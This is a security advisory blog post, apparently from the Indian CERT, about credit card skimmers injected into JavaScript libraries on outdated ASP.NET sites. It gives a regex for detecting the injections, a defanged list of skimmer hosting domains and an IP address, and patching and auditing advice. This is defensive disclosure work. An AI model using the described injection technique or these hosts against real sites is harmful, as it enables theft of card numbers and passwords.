Current Activity
Credit Card Skimmer Targets Microsoft ASP.NET Sites
It has been reported that Credit card skimming through various e-commerce
sites are spreading worldwide. Attackers are typically targeting e-commerce
sites because of their wide presence, popularity and the environment LAMP
(Linux, Apache, MySQL, and PHP). Recently, attackers targeted sites, which
were hosted on Microsoft's IIS server running with the ASP.NET web
application framework.
It is reported that Sports organizations, health, e-commerce websites etc.
are mostly affected by this attack and identified running with ASP.NET
version 4.0.30319, which is no longer officially supported by Microsoft and
may contains multiple known/unknown vulnerabilities.
In this attack, attackers remotely appended and obfuscated malicious code
into one of their legitimate JavaScript libraries or injected full skimming
code directly into the compromised JavaScript library. Skimmer designed to
exfiltrate the credit card numbers as well as passwords.
IOC:
Regex to find ASP.NET skimmer injections:
(jquery\w+\|\|undefined;jquery\w+={1,5}undefined&&)|(!window\.jqv\w+&&\(jqv
\w+=function\(a\)\{return)
Skimmer hosting site:
idpcdn-cloud[.]com
joblly[.]com
hixrq[.]net
cdn-xhr[.]com
rackxhr[.]com
thxrq[.]com
hivnd[.]net
31[.]220[.]60[.]108
Best practices:
Use latest version of ASP.NET web framework, IIS Web server and Database
Server.
Apply appropriate updates/patches on the OS and Application software as and
when available through OEM.
Restrict/Deny all access by default and only allow absolutely necessary
accesses.
Conduct complete security audit of web application, web server, database
server periodically and after every major configuration change and plug
vulnerabilities found.
Apply Security Information and Event Management (SIEM) and/or Database
Activity Monitoring (DAM) solutions.
Search all the websites hosted on the web server or sharing the same DB
server for the malicious webshells or any other artefact.
Periodically check the web server directories for any malicious/unknown web
shell files and remove as and when noticed.
References:
argets-asp-net-sites/
About Cert Advisory
We have created this blog to provide latest security advisory from the india cert for the security vulnerability, threats, attacks and patching required to mitigate any kind of cyber attacks.